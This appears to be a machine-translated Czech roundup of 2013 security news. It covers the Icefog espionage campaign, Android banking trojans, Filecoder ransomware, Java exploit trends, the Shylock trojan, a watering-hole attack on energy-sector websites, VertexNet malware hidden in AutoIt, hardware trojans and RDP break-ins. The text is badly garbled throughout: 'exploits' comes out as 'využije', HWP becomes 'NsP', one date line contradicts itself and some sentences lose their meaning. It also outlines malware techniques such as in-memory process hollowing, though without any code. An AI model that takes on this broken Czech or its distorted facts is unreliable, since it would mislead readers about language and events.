Kromě dokumentů Office, útočníci používají nebezpečné stránky s JAVA využije (CVE-2013-0422 a CVE-2012-1723) a škodlivý NsP a HLP soubory.
Poznámka 1: Oracle vydali patche jak pro JAVA využije Leden 20, 2013 12.06.2012 resp.
Poznámka 2: "HWP" jsou textové soubory používané procesoru Hangul Word. Podle Wikipedie, Hangul (také známý jako Processor Hangul Word nebo NsP) je proprietární aplikace na zpracování textu publikoval jižní korejské společnosti Hancom Inc To je používáno značně v Jižní Koreji, a to zejména ze strany vlády.
Jsou útočníci používají nějaké zero-day zranitelnost? Nesetkali jsme se používání jakýchkoli zero-day zranitelností. Nicméně, nemůžeme zcela vyloučit, že unpatched slabá místa softwaru, může být cílené.
Na jedné z obětí, jsme pozorovali, co se zdá být použití Kernel exploit přes Java aplikaci za to, co se zdálo, že eskalace oprávnění, i když nevím, jestli je to zero-day, či nikoli soubor byl smazán útočníků po použití.
Je to pouze pro systém Windows hrozba? Které verze systému Windows jsou určeny? Existují Mac OS X nebo Linux varianty? K dispozici jsou i Windows a OS X varianty Icefog. V počítačích se systémem Windows jsou infikováni prostřednictvím "Udeř a uteč" cílených útoků. Útočníci přijde krást, co chtějí, a odejít. Mac OS X stroje byly napaden jiným způsobem v tom, co se zdá být "beta testování" fáze Mac OS X backdoor.
Už jste viděli důkaz o mobilní komponent v. iOS, Android nebo BlackBerry? I když máme podezření na možný Android variantu, máme-útočiště t byl schopen najít to ještě.
Co se stane po cílový počítač je nakažený? Jakmile backdoor dostane klesl na stroj, pracuje jako dálkově Trojan se čtyřmi základními kybernetické špionáže funkcí:
Únosy a obrázky základní informace o systému C & C servery vlastnictví a pod kontrolou útočníků. Umožňuje útočníci tlačit a spouštět příkazy infikovaného systému. Krást a vkládat z obětí na velení a řízení serverů. Stahování souborů (nástroje) z C & C servery do infikovaných počítačů. Umožňuje útočníci přímo spouštět SQL příkazy na všech MSSQL serveru v síti. Jak je to odlišné od jakéhokoli jiného APT útoku? Obecně platí, že každý APT útok je jiný a jedinečný ve svém vlastním stylu. V případě Icefog, existují určité charakteristické rysy, které se odlišuje:
Zaměřují téměř výhradně na Jižní Koreje a Japonska cíle. Krádež souborů není automatické, místo toho útočníci zpracování obětem jeden po druhém - se najít a zkopírovat pouze související informace. Web-based velení a řízení implementace s pomocí. NET. Velení a řízení zachování plné útok na špalky plněné každý příkaz běžel útočníků na jejich oběti. Použití NsP dokumentů se využije. Několik set Mac OS X infekce. Jak jste si vědomi této hrozby? Kdo to nahlásil? V červnu 2013 jsme získali cílený útok proti vzorku Fuji TV. Kopí-phishing e-mail obsahoval škodlivý přílohu, která klesla na Icefog malware. Po další analýze jsme identifikovali další varianty a více kopí phishingové útoky.
Při analýze nový útok, to stalo se jasné, to byla nová verze malwaru, který napadl japonské parlamentu v roce 2011 . Vzhledem k významu útoku, jsme se rozhodli udělat důkladné vyšetřování.
Kolik varianty Icefog existuje? Existují velké rozdíly ve variantách? Existuje několik variant, které byly vytvořeny v průběhu let. V naší analýze jsme sledovali:
"Staré" 2011 Icefog - který pošle ukradené údaje prostřednictvím e-mailu, tato verze byla použita proti japonskému parlamentu v roce 2011. Typ "1", "normální" Icefog - který spolupracuje s C2-S. Typ "2" Icefog - které komunikuje s proxy, která přesměruje příkazy z útočníků. Typ "3" Icefog - my don-t mít vzorek, ale jsme zaznamenali určitý druh C2, který používá jiný způsob komunikace, máme podezření, že jsou oběti, které mají tento malware. Typ "4" Icefog - stejná situace jako "typ 3". Icefog-NG - který komunikuje pomocí přímého připojení TCP na portu 5600 na C2. Je velení a řízení serveru používá Icefog stále aktivní? Už jste byli schopni sinkhole některý z C & Cs? Ano, jsou více aktivní Icefog C a C-s v současné době, se živými oběťmi připojení k nim. Také jsme byli schopni závrtu několika oblastech využívaných Icefog a shromažďovat statistické údaje o obětech. Celkově jsme zaznamenali více než 3600 unikátních IP adres a infikovaných několik set obětí. Plné Sinkhole statistiky jsou k dispozici v našem Icefog papíru.
Co přesně je ukraden z cílových počítačích? Útočníci kradou několik typů informací, včetně:
Citlivé dokumenty a firemní plány. E-mail pověření účtu. Hesla pro přístup různých zdrojů uvnitř i vně oběť k síti. Je to národ-stát podporovaný útok? Neexistuje žádný konkrétní důkaz, aby potvrdil to byl národ-stát podporovaný provoz. Jediným způsobem, jak rozlišit protivníka skupin tím, že určí jejich význam v rámci kampaně.
Apts mohou zaměřit jakékoliv organizace či podnik s cennými daty, ať už je to národní stát sponzorovaný cyber-espionage/surveillance provoz, nebo finančně motivované cyber-kriminální operace. Na základě analýzy a topologii obětí by útočníci se převodu ukradených dat do peněz nebo jej používáte cyber-účely špionáže.
"Hit a run" povaha této operace je jedna z věcí, které dělají to neobvyklé. Zatímco v jiných případech, oběti zůstává infikovaný měsíce nebo dokonce roky, a data jsou neustále exfiltrated se Icefog útočníci jeví velmi dobře vědí, co je třeba z obětí. Jakmile je informace je získána, se opouští oběť.
Během posledních let jsme zaznamenali velký nárůst počtu apts které zasáhly skoro všechny typy obětí a odvětví. Na druhé straně, je to spojeno se zvýšeným důrazem na citlivé informace a firemní počítačové špionáže.
V budoucnu předpokládáme počet malých, zaměřených APT-to-najmout skupin rostou, specializující se na hit-and-run operací.
Kdo je za to zodpovědný? Uveďte informace o Icefog je k dispozici prostřednictvím naší soukromé zprávě dostupné pro partnery vlády a vymáhání práva.
Kromě Japonska a Jižní Koreje, jsou tam oběti v jakékoli jiné zeměpisné poloze? Ano, jsme pozorovali mnoho obětí v několika dalších zemích, včetně Tchaj-wanu, Hongkongu, Číně, USA, Austrálii, Kanadě, Velké Británii, Itálii, Německu, Rakousku, Singapuru, Běloruska a Malajsie. Domníváme se však, že tento seznam zemí nemusí představovat skutečný zájem z útočníků. Některé vzorky byly distribuovány prostřednictvím veřejně přístupných internetových stránkách a mohou zasáhnout náhodné oběti z jakékoliv země na světě. Věříme, že to bylo děláno, aby sonda malware v různých prostředích a vyzkoušet jeho účinnost.
Na jak dlouho, že útočníci byli aktivní? Icefog působí nejméně od roku 2011, se zaměřením hlavně Jižní Koreje a Japonska. Známé cílům patří vládní instituce, vojenští dodavatelé, námořní / lodní stavitelství skupiny, telekomunikační operátoři, průmyslové a vysoce technologických firem a médií.
Věděli útočníci použít některé zajímavé / pokročilých technologií? Příkaz-a-ovládací prvky jsou neobvyklé v jejich rozsáhlé využití technologií AJAX, což je graficky lákavé a snadné použití. K útoku obětí, Icefog útočníci běžně používá NsP dokumenty, které jsou neobvyklé a vzácná forma útoku, částečně proto, že se výrobek HWP používá téměř výhradně v Koreji.
Jednou jedna z obětí, jsme pozorovali, co se zdá být použití Kernel exploit prostřednictvím Java aplikace pro eskalaci oprávnění, i když nevím, jestli to byl zero-day, nebo ne, jak byl soubor není k dispozici .
Má Kaspersky Lab detekovat všechny varianty tohoto malware? Ano, naše produkty detekovat a odstranit všechny varianty malwaru použité v této kampani:
Existují Ukazatele kompromis (IOCs), jak pomáhat obětem identifikovat vniknutí?
Krátký přehled Android malware bankovního 25.09.2013 Mobil | Viry Jak více a více lidí používá své mobilní telefony ke své online bankovnictví, převody peněz, a tak dále, počítačoví podvodníci třímající bankovní malware, se stále více obracejí k cílení mobilních uživatelů. "Bankovní trojské koně pro mobilní telefony byly velmi úspěšné zacílení starších systémů generace operačního jako J2ME a Blackberry, ale nebyly provedeny pokrok, že bych asi chtěl na Android a iOS, "říká Malwarebytes 'Armando Orozco.
Ve skutečnosti, pokud ví, že žádné bankovní trojské koně pro platformu iOS byl objeven, s největší pravděpodobností proto, že je velmi obtížné propašovat malware do obchodu Apple App Store. Zatímco Android malware stále převážně soustředí na podvodu SMS, bankovní trojské koně jsou není zcela znám. "ZitMo, SpitMo a CitMo jsou mobilní bratranci Zeus, SpyEye a Citadela, tři nechvalně bankovní trojské koně, které ovlivňují systém Windows," říká Orozco. "Ti všichni udělal dojem na Android a měli nějaký úspěch." Fungují zachytí textové zprávy, které obsahují mTANs (mobilní čísla transakce ověření) - další způsob, jak zajistit bezpečnost on-line uživatelů bankovních operací - a odesílání je na vzdálené servery pro útočníci použít k zosobnění obětí a vypusťte své účty. Zitmo bylo známo, že vydávat se jako bezpečnostní řešení pro Android, a funguje ve spojení se systémem Windows Trojan, který je schopen vstřikování další : Během bankovní uživatelů zasedání, žádají oběti podělit se o své telefonní číslo a model. SpitMo a CitMo práce ve velmi podobným způsobem. Hesperbot je mobilní verze je velmi Posledním přírůstkem do skupiny. Šíří se přes phishingových e-mailů, a to je zajímavé poznamenat, snaží se infikovat Android zařízení, ale i těch, kteří vedou Symbian a BlackBerry. PC malware keylogging schopnosti, může vzít screenshoty a unášet telefonu fotoaparát k zachycení videa, nastavit vzdálených proxy, atd., a zachycuje oběti telefonní číslo, aby mohla dodávat mobilní Trojan složku přes odkaz v SMS. Jakmile je mobilní verze je nainstalována, funguje to stejně jako Zitmo a ostatní: zachytí textové zprávy účetní autentizační kódy. Perkel je další finanční malware cílení Android uživatelům. PC verze se chová jako malware Hesperbot je, s tím rozdílem, že vyzve uživatele k instalaci certifikátu zabezpečení a požádat o jejich telefonní číslo předem. Mobilní složka, podobně, dodáno prostřednictvím SMS. zajímavá věc, že výzkumníci zjistili, že digitální certifikát varianta Perkel malware byl podepsán, aby to vypadalo, že aplikace byla vytvořena legitimní podnikových bezpečnostních USA. "Toto také poukazuje na to, jak otevřít hřiště Android je, že někdo může podepsat jejich aplikace jakýmkoliv způsobem a nedochází k ověření, "říká Orozco. "Nezapomeňte opatrní při používání mobilních bankovních aplikací a snaží se vyhnout přístupu k vašemu bankovní účty přes nejistý a / nebo veřejné sítě, "řekl nakonec varuje. "Pokud si nejste jisti, že aplikace je z vaší banky, to nikdy neuškodí zkontrolovat s nimi před instalací.
Velký nárůst malwaru Filecoder 25.09.2013 Viry ESET HQ malware výzkumná laboratoř hlásí neobvyklý hrot v actvity malware Filecoder -. Trojských koní, které šifrování uživatelských souborů a pokusit se vydírat výkupné od oběti výměnou za dešifrování software ESET LiveGrid - společnosti cloud-based malware systém sběru - ukázal rostoucí týdenní počet odhalených Win32/Filecoder o více než 200%, od července 2013 z průměrného počtu v období leden - června 2013. Nejvýznamnější podíl na odhalení (44%) jsou z Ruska, ale významný podíl je vykazován v jižní Evropě (Itálie, Španělsko), střední a východní Evropy (Německo, Česká republika, Polsko, Rumunsko a Ukrajina) a Spojené státy . infikovat počítač, zločinci používají různé metody infiltrace:. drive-by download z malware laděných webových stránek, e-mailů, instalace prostřednictvím jiné Trojan nebo backdoor, nebo dokonce ruční instalaci útočníka "Win32/Filecoder malware rodina je mnohem nebezpečnější než jiné druhy tzv. ransomware jako obvykle šifrovat fotografie, dokumenty, hudbu a archivy. Široká škála technik a úrovní kultivovanosti byl viděn v různých variantách v průběhu času, "říká Robert Lipovský, ESET Malware výzkumník. "To může být velmi drahé. Vzorků malwaru v této kategorii obvykle požadují částky kolem € 100 - € 200, ale některé z nich byly vidět vydírat až do výše € 3000. Velké množství je v souladu s tím, že útočníci většinou se zaměřují podniky, které mohou obvykle dovolit platit vyšší výkupného než jednotlivci, "dodává. Jedna nedávná varianta klade obětí pod tlakem tím, že zobrazuje odpočítávání o tom, že šifrovací klíč bude trvale odstraněn a obnovu šifrovaných souborů téměř nemožné. ESET doporučuje, aby uživatelé internetu jsou chráněny pravidelně aktualizované anti-virus software. Nicméně, to je také dobrý nápad chránit heslem anti-malware software je nastavení zabránit jim být změněn útočníkem a zálohování pravidelně.
Neoficiální Android aplikace iMessage mohou krást informace a stáhnout malware 25.09.2013 Viry | Mobil Android uživatelé, kteří snili o tom být schopný používat iMessage, Apple proprietární a bez řešení pro zasílání zpráv, které byly příjemně překvapeni IMessage konverzaci pro Android nabízeno ke stažení na Google Play.
Funguje to tak, jak výrobce, a představuje jako Mac mini, když se připojí k serveru Apple IMessage. Ale podle 9to5Mac , výzkumníci a vývojáři softwaru varují před jeho použitím. Za prvé, to nebyla vytvořena společností Apple, ale vývojáře třetí strany jménem Daniel Zweigart, který může nebo nemusí mít škodlivé úmysly. Za druhé, jsou zprávy uživatelům odesílat a přijímat pomocí této aplikace nejprve zpracován serverem prostřednictvím se nachází v Číně, pak předány serveru společnosti Apple. Za třetí, použít aplikaci mají buď zpívat se svou Apple ID nebo vytvořit nový Apple účet a přihlaste se - to znamená, že tyto přihlašovací jméno a heslo bude předána - a to by mohlo být skladovány a zneužil -. podle Zwigert V neposlední řadě, app prý má schopnost stáhnout další APK kódu bez vědomí uživatele - to znamená, že by si také stáhnout malware. Na tomto místě by mě zajímalo, jak to, že Google ještě zjišťuje a odstraňuje potenciálně škodlivé aplikace z jejich úředním obchodě Android Market. Ale i když se tak stane, bude třetí-party on-line aplikací pro systém Android trhy pravděpodobně vítají. Uživatelům se doporučuje, aby se zabránilo použití aplikace až do další podrobnosti o něm jsou známy a vražda je vyloučeno. UPDATE: Google odstranil aplikace z Google Play .
Java využije skok, Android malware se objeví mimo app obchodech 25.09.2013 Viry | Zranitelnosti | Hacking Pokračující vzestup využívání útoků na, a to zejména proti Javě, a rostoucí sofistikovanost v mobilních hrozeb charakterizoval první polovině roku 2013, který viděl jeho podíl na zajímavých vývoj ve světě digitální bezpečnosti. Podle nové F-Secure je Threat Report , téměř 60% z top F-Secure deset zjištěných v prvním pololetí roku 2013 byly hrdinské činy. vysoké procento zjištěných činů je dobrá věc, podle Sean Sullivan, bezpečnostní poradce ve společnosti F-Secure Labs. "Skutečnost, že většina našich deset nejlepších detekcí blokují využije spíše než s užitečným zatížením - to znamená, že děláme dobrou práci, ujistěte se, že malware sám o sobě nemá ani šanci vstoupit do stroje," říká . Uživatelé v USA viděl největší chybu související útoky s 78 z každých 1000 uživatelů potýká exploit pokus. Německo a Belgie následovala 60 ze 1000 potýká exploit pokusy. Java cílené využije vést smečku využije jako celku, což tvoří téměř polovinu z deseti největších odhalení, a to až z třetiny předchozí pololetí. Využije jsou programy, ale jsou to prostě jen další prostředek pro získání škodlivého kódu do stroje, jako infikované jednotky USB nebo e-mailem. Obvykle útočí přes škodlivé nebo narušení webových stránek, které využívají chyb v kódu na počítači je nainstalované aplikace pro přístup do počítače a infikovat ji s malware, který může špehovat na uživatele, ukrást hesla nebo jiná citlivá data, nebo povolit zločinci převzít kontrolu ze stroje. bylo 358 nových rodin a varianty malwaru Android objeven Labs F-Secure v 1. pololetí téměř zdvojnásobil celkový počet Labs kdy objevil na 793. (Počet vzorků Android nacházejí v 1. pololetí bylo 405.140, včetně spyware a adware, malware vzorky samostatně číslovány 257443). Symbian následoval s 16 nových rodin a variant. Žádné nové rodiny nebo varianty byly objeveny další mobilní platformy. Android malware není jen distribuována app obchodech už, a to buď. V první polovině roku 2013 došlo rozvoz malvertising a automatickým stahováním z webu při návštěvě ohrožena stránky. Malvertising nebo reklamy, které vedou uživatele na nebezpečné výrobky, se stále více používá k distribuci mobilního malware, náležitý z části k jeho širokému dosahu. Zatímco ještě méně sofistikované na mobil, než na PC, jsou drive-by download bude pokračovat jako útoku. Mobile Drive-bys použít potvrzující zprávu s dotazem, zda chce uživatel nainstalovat aplikaci, což je více než zřejmé, PC drive-odstavných ploch, s možností obcházet. Stels, trojské Android, které slouží více účelům, od budování botnety krást Čísla mobilních transakcí Authentication (mTANs) jako bankovní trojan, používá metody, které jsou obvykle charakteristické pro Windows malware, jako je spam jako metody distribuce. To slouží jako důkaz, že Android malware se postupující blíže k dosažení vysoce rozvinutou úroveň hrozby Windows.
Nelze udržet špatný muž se : " Shylock " Trojan se vrací k útoku amerických bank
22 září 2013 Viry | Hacking
Kradmý bankovnictví Trojan známý jako Caphaw nebo Shylock se vynořuje - a útočí na zákazníky z 24 amerických bank . Je vyzbrojen obranných a stealth schopností , včetně pravomocí " obnovit " se během vypnutí .
Malware je popisován jako " jeden z mála , který může ukrást peníze , kdyžuživatel přistupující jeho bankovní konta , " ESET Team Security Intelligence olovo , Aleksandr Matrosov , kdo vydal podrobnou analýzu malware v letošním roce.
" Je to zajímavý finanční malware rodina : jeden z mála, který má funkce autoload pro automatické krást peníze , když uživatel aktivně přístupu jeho bankovní účet. Infikovaný uživatel nemůže rozpoznat , že jeho peníze jsou ukradené, " píše Matrosov .
" Tato hrozba má mnoho technik pro vynechání bezpečnostní software a vyhnout automatizované zpracování vzorků malwaru . "
Zscaler uvedl na svém blogu : " Za poslední měsíc se ThreatLabZ vědci aktivně sleduje nedávné uptick v počtu Win32/Caphaw ( od nynějška známá jako Caphaw ) infekce , které se aktivně zaměřují na bankovní účty uživatelů od roku 2011 . Můžete rozpoznat tuto hrozbu z výzkumu hotový WeLiveSecurity letos v souvislosti s touto hrozbou cílení EU bankovní weby . Tentokrát se zdá být v ničem neliší . Zatím jsme svázané tuto hrozbu monitorovat Je to oběť za přihlašovací údaje do 24 finančních institucí. "
Bezpečnostní firma Zscaler oznámily nárůst detekcí malware tento týden, zaměření 24 amerických bank včetně Chase Manhattan , Bank of America , Citi a Wells Fargo . Poprvé zjištěn v roce 2011 ,malware cílený evropských zákazníků ve Velké Británii , Itálii, Dánsku a Turecku.
Zscaler Výzkumníci říkají, že malware byl pravděpodobně šíří pomocí exploit kitu přes zranitelných verzí Javy.
V tuto chvíli ESET Virus Radar ukazuje nárůst infekcí v Severní Americe. Zscaler varuje, že kradmé povaha malwaru znamená, že je obtížné zjistit - více informací na stealth schopnosti tohoto malwaru lze nalézt v analýze Matrosov je.
" Caphaw můžete ovládat restart / vypnutí procesu a umožňujemalware obnovit sám po některé antivirové čistící postupy byly provedeny , " řekl Matrosov ve své funkci .
Příspěvek nelze udržet špatný muž se : " Shylock " Trojan se vrací k útoku amerických bank se objevila na prvním místě Žijeme zabezpečení.
Webové stránky firem z odvětví energetiky ohrožena zalévání děr útok 20. září 2013. Viry | Hacking | Zranitelnosti Webové stránky téměř tucet firem z odvětví energetiky byly zneužity sloužit jako tzv. "zalévání děr", kde by se návštěvníci podávané s malware nebo které by mohly být přesměrovány na jiné webové stránky, kde je totéž by se stalo.
Podle Cisco výzkumníků, kteří sledovali útok od začátku května, mezi deseti webových stránek, které byly injekce s nebezpečným iframe použité v kampani, jedna patří k průzkumu ropy a zemního plynu firmy s operacemi v Africe, Maroku a Brazílie , jeden na rozvod plynu se nachází ve Francii, jeden fyzické stanice plynové elektrárny ve Velké Británii, a několik investičních a kapitálových firem, které se specializují na odvětví energetiky. Téměř polovina návštěvníků na těchto stránkách pocházejí z finančního a energetického sektoru. "Je zajímavé, že šest z deseti iframe vstřikováním webových stránek hostované na stejném serveru, zřejmě služby podle stejné firmy web design. Tři z těchto šesti byl rovněž ve vlastnictví téže mateřské společnosti," zdůraznil Cisco Emmanuel Tacheau. "To je pravděpodobně údaj lokality byly ohroženy prostřednictvím ukradených přihlašovací údaje, případně v důsledku infekce s konstrukční firmy nebo jejich poskytovatele hostingu." malware je umístěn na stránkách tří napadených internetových stránek ( keeleux.com , kenzhebek.com a nahoonservices.com ) a nainstalovat na počítače obětí útočníci mají pákový efekt, využít kód pro zranitelností ve starších verzích Javy, Internet Explorer a Firefox / Thunderbird. Tacheau neříká, zda je kampaň probíhá, ale ukázal na to, že jak čas plynul, útočníci modifikovali vstřikováním iframe, využívat kódu a servírované malware. "chrání uživatele před těmito útoky zahrnuje vedení stroje a webových prohlížečů plně patch, aby se minimalizovalo množství chyb zabezpečení, které útočník může zneužít," poukázal na to, s tím, že webový provoz filtrování řešení nasazeno na úrovni sítě může blokovat škodlivý obsah před tím, než může dosáhnout stroje určeného cíle.
Vertexnet Botnet se skrývá za AutoIt
20. září 2013. BotNet | Bezpečnost | Viry
Nedávno jsme objevili nové škodlivé vzorků pomocí Autoit ukrýt. Na další analýzy jsme zjistili, že ti vzorek patří do Vertexnet botnet. Oni používají několik vrstev mlžení, jednou dekódovány, se připojují k řídící server přijímat příkazy a přenášet ukradených dat. Tento vzorek je zabalen pomocí vlastní balírny. O výkonu klesne tři soubory v složky% TEMP%.
Tyto soubory jsou zpracovány s využitím aut2exe. Další malware spustí soubor botnet.exe ze složky temp. Tento soubor je napsán v AutoIt. Můžeme snadno dekompilovat ho pomocí Exe2Aut.
Tento soubor používá různé popletl proměnné, které jsou šifrovány pomocí jednoduchého algoritmu:
Dekódování proměnné, můžeme vidět, že tento skript volá různých rozhraní API systému Windows pomocí AutoIt DLL funkce DllStructCreate, DllStructGetPtr, DllCall, atd.
Vyhledávání Google, jsme snadno najít původní kód by mohly být použity v předchozím skriptu se mlžit: http://www.autoitscript.com/forum/topic/99412-run-binary/ (Předchozí příspěvek obsahující informace o tom, jak spustit spustitelný soubor z paměti je starý. Bylo vyrobeno asi 2009 na autoitscript.com.) Technika spuštění spustitelný soubor z paměti pomocí skriptu AutoIt je dobře zdokumentováno na tento odkaz. Abychom to shrnuli, že nejprve vytvoří proces s CREATE_SUSPENDED vlajkou:
Dále se používá GetThreadContext dostat kontextu strukturu:
Následně se používá WriteProcessMemory, SetThreadContext a přiděluje paměť pro data.
Pak pokračuje nit:
Po dumping dat výběrových WriteProcessMemory, dostaneme Visual Basic soubor, který používá metodu RunPE vykonat užitečného zatížení:
Konečný náklad je VertexNet 1,2, což jsme zjistili z řetězců, které obsahuje: O provedení konečné užitečného zatížení, komunikuje s řídícím serverem:
Vidíme neustálý nárůst AutoIt malware, protože jeho snadné použití. Zjistili jsme, že autoři malware vždy ready-made nástroje a rychle se přizpůsobit novým trikům. McAfee zákazníci jsou chráněny proti této hrozbě podpisem IPS: BOT: VertexNet Bot zjištěna činnost. Rád bych poděkoval svému kolegovi Arunpreet Singha za jeho pomoc s analýzou této hrozby.
19.09.2013 Viry | Hardware | KyberSecurity Tým bezpečnostních výzkumníků z USA a Evropy zveřejnil pojednání ukazující na to, jak mohou být integrované obvody v počítačích i armádním vybavení během výrobního procesu napadeny pomocí neodhalitelných změn na úrovni tranzistorů.
Pojednání jako příklad účinnosti této metody popisuje, jak by mohla být použita k upravení a oslabení generátoru náhodných čísel na procesoru Ivy Bridge.
Tento výzkum je prvním, který popisuje možnost vložení hardwarového trojského koně do procesoru bez dodatečných obvodů, tranzistorů či jiných zdrojů, popsal Christof Paar, vedoucí fakulty informačních technologií na německé Rúrské univerzitě.
Podle Paara jsou hardwarové trojské koně předmětem výzkumu již od roku 2005, kdy americké ministerstvo obrany vyjádřilo znepokojení nad tím, že se armáda spoléhá na integrované obvody vyráběné v zahraničí.
Jednotlivé bloky obvodu v jediném mikročipu často navrhuje několik různých subjektů, vyrábí je jedna zahraniční firma, druhá je balí a třetí distribuuje, což podle pojednání vedlo k problémům s důvěrou a k obavám o bezpečnost.
V průběhu let věnovali výzkumníci pozornost spíše nacházení způsobů, jak tyto zákeřné součásti v hardwaru, které byly do čipu záměrně umístěny během výrobního procesu, nalézt a odstranit, především v případech, kdy mají čipy sloužit například armádě. Celkem překvapivě se však mnohem méně pozornosti věnovalo tomu, jak by mohl někdo hardwarového trojského koně v první řadě sestavit a implementovat.
Předchozí výzkumy popisovaly hardwarové trojské koně skládající se z malých až středních integrovaných obvodů přidaných do procesoru během vytváření vrstvy jazyka popisu hardwaru. Poslední výzkum oproti tomu ukazuje, jak může být trojský kůň umístěn v pozdější fázi výroby, a to změnou dopování v několika tranzistorech.
Dopování je proces, který modifikuje elektronické vlastnosti křemíku přidáním různých „nečistot“, například boru, fosforu nebo galia, jeho přepnutím přestanou části integrovaného obvodu fungovat tak, jak by měly.
Změny se odehrávají na úrovni atomů a podle Paara je opravdu těžké něco takového zpozorovat. „Opticky nelze poznat rozdíl,” řekl. Trojský kůň je tak odolný proti většině detekčních technik.
Kryptolog a bezpečnostní výzkumník Bruce Schneier nazval sabotáž, kterou výzkumníci ve své práci popisují, jako „nerozpoznatelnou funkčními zkouškami ani vizuální prohlídkou“. Nejhorším zneužitím této techniky je podle Schneirera úprava generátoru náhodných čísel. „Tato technika by mohla snížit množství entropie v hardwaru ze 128bitové na 32bitovou, aniž by to vestavěné testy zaznamenaly.“ Takže zatímco by uživatel předpokládal, že generátor náhodných čísel produkuje silné 128bitové šifrovací klíče, ve skutečnosti by generoval pouze snadno prolomitelné 32bitové.
Vědci vytvořit nezjistitelné layout úrovni hardwaru trojské koně 17. září 2013. Viry | Hardware Skutečnost, že většina počítačového hardwaru je produkována mimo USA a Evropě je již dlouho představila starost vlád těchto zemí, a pro podniky a korporace se sídlem v nich. jsou především obavy o bezpečnost integrovaných obvodů používaných ve vojenských zařízeních, průmyslové řídicí systémy, zdravotnické a jiné důležité zařízení, a jsou si vědomi, že možnost hardwarových trojské koně jsou integrovány v nich během výrobního procesu není vůbec přehnané. Skupina výzkumníků z několika univerzit v USA, Švýcarsku, Nizozemí a Německo se nedávno zveřejnila dokument zabývající se právě této možnosti, a navrhly za "velmi nenápadný přístup k realizaci hardwaru trojské koně pod úrovni hradel". "Často okruh bloky v jednom IC jsou navrženy různými stranami, vyrábí externí a případně off-shore slévárna, baleny samostatné společnosti a dodává nezávislý distributor. Toto zvýšené využívání out-sourcing a agresivním používání globalizace ve výrobě okruhu dala vzniknout několika otázky důvěry a bezpečnosti, neboť každý ze zúčastněných stran potenciálně představuje bezpečnostní riziko, "poukázali, a dodal, že hrozba hardwaru trojské koně se očekává pouze s časem zvyšovat, a to zejména s nedávným obavám kybernetická válka. Jejich Není to první výzkum do vytvoření hardwarové Trojan, ale je mezi prvními ty, které místo přidání další obvody pro konstrukci IC je již soustředěna na změnu příměsí polaritu několik jeho tranzistorů. "doping" tranzistor se provádí zavedením nečistot do své struktury za účelem změny jeho elektrické vlastnosti. Předchozí výzkumy se podařilo, aby se jim nepodaří před tím, než by měl mít, ale tato skupina se podařilo, že ochrana poskytovaná Intel generátor náhodných čísel (RNG), slabší, než bylo zamýšleno, a vytvářet skryté boční kanál do implementace AES sbox v aby unikat tajné klíče. Ale nejdůležitější ze všeho je, jejich modifikace zmást řadu společných metod Trojan testování, které je součástí optical inspekce a kontroly proti "čipy zlatých" (tj. konečné, ověřené příkladem toho, jak by měl vypadat, že čip a být) . "Pro našeho nejlepšího vědomí, naše dopant bázi trojské koně jsou nejprve navrhoval, provedeno, testovány a hodnoceny layout-level hardware trojské koně, které mohou dělat více, než působí jako denial-of-service trojských koní založených na účinkům stárnutí", které uzavřena.
Remote Desktop ( RDP ) Hacking 101: Vidím svůj desktop od tady!
17 září 2013 Viry | Hacking | Zabezpečení
V poslední době jsme zaznamenali nárůst zpráv o malwaru instaloval přes Remote Desktop Protocol ( RDP ) . To je silný protokol, který byl nechat si zobrazit plochu systému Windows " na drát " na druhé straně zeměkoule (nebo zpět na své domů z kanceláře ) pro více než deset let . Je smutné, že zatímco RDP mohou sloužit řadu užitečných účelům od dálkového ovladače " hands-on " podporu konfigurace a provoz serverů , ve špatných rukou může býtdálkové ovládání zbraní, která umožňuje špatní herci na zombify počítač a nechte jej dělat jejich nabízení .
Jak se to mohlo stát? Pokud je váš počítač " naslouchá " pro signál RDP ( typicky přes portu TCP 3389 ) , a je připojen k internetu , bude reagovat, kdyžvzdálený uživatel požádá , pokud je to živé . Pro vzdálené uživatele , budou prezentovány s přihlašovací obrazovce na ploše, často bez povšimnutí vás ( zvláště pokud je počítač zapnutý a právě stalo, že se od ní ) . V tomto bodě, bude váš počítač vyzve je k zadání hesla - obvykle . Pokud máte špatně nakonfigurovaný RDP nastavení na vašem počítači však může jen nechat je dál -li tomu tak , je to jen začátek své problémy .
Co může PRV vetřelci dělat? Máte-li oprávnění správce přiřazené k uživateli se přihlásí as, mohou se počítač po neomezenou rotaci kolem bloku , a to od jeho vypnutí , restartování jej , instalace softwaru (včetně malwaru ) , nebo jen s rozhlédnout najít dokumenty souborů s vaší kritické osobních údajů v nich, jako je bankovnictví, účetnictví, nebo jiné informace a pak duch je pryč celé síti jejich domácích počítačích pro hanebné účely .
Jak se vám zastavit tohle všechno? První věc je vědět, jestli jste RDP povolen . To je snadné zkontrolovat z ovládacího panelu v části Systém > Vzdálená Nastavení> Připojení ke vzdálené ploše ( pod Windows 7 , ostatní operační systémy se liší ) .
Windows 7 RDP blokování
Všimněte si tento test má počítač Remote Desktop (RDP ), se zdravotním postižením, což je v pořádku pro testovací účely , protože nikdo by neměl být přihlášení vzdáleně tohoto rámečku. Ale pokud se rozhodnete povolit připojení nějaký čas trvat, definovat, kdo si myslíte, že by mělo být připojení pomocí " Vybrat uživatele ", dialogové okno :
RDP- uživatelé
Všimněte si , že jste uživatel přihlášen jako již nemá přístup ( zahalené v příkladu ) . Když vzdálenému útočníkovi přijde volání by to mohlo způsobit problémy pro bezděčná uživatele, který je přihlášen jako administrátor . Velmi pravděpodobně protivníci budou usilovat o získání zvýšené přístup a přihlášení jako správce jerychlý způsob, jak to udělat . Nemohou-li se pár, který je platný uživatel s snadný-k - uhodnout heslo , že mám klíče od počítače korunovačních klenotů .
V poslední době jsme zaznamenali nárůst počtu RDP - útoky pomocí trojského koně Win32/Filecoder.NAH (také známý jako ACCDFISA ), která se pokouší šifrovat soubory na vašem počítači a výpalné platit padouchy na jejich zpřístupnění .
Nevadí , že je to vždy dobrý nápad poslat peníze na podvodníky v systému , jako je tento (zejména prostřednictvím kreditní karty , který prakticky zaručuje další podvod ) , může celá věc se jednoduše vyhnout tuto službu , pokud nepotřebujete to a chránit jej , pokud nemáte .
Když už mluvíme o ochranu , kromě nepoužíváte snadno uhodnout jména uživatelů by silné heslo také jít dlouhé cesty směrem k ochraně účtu. Jestliže hackeři programově "odhadnout " vaše heslo, protože je založen na jednoduché slovo - , že budou poměrně rychle . Na druhou stranu, pokud je to složité , což znamená, kombinace malých a velkých písmen, číslic a symbolů ( čím déle , tím lépe) , jejich úkolem se stává mnohem více skličující.
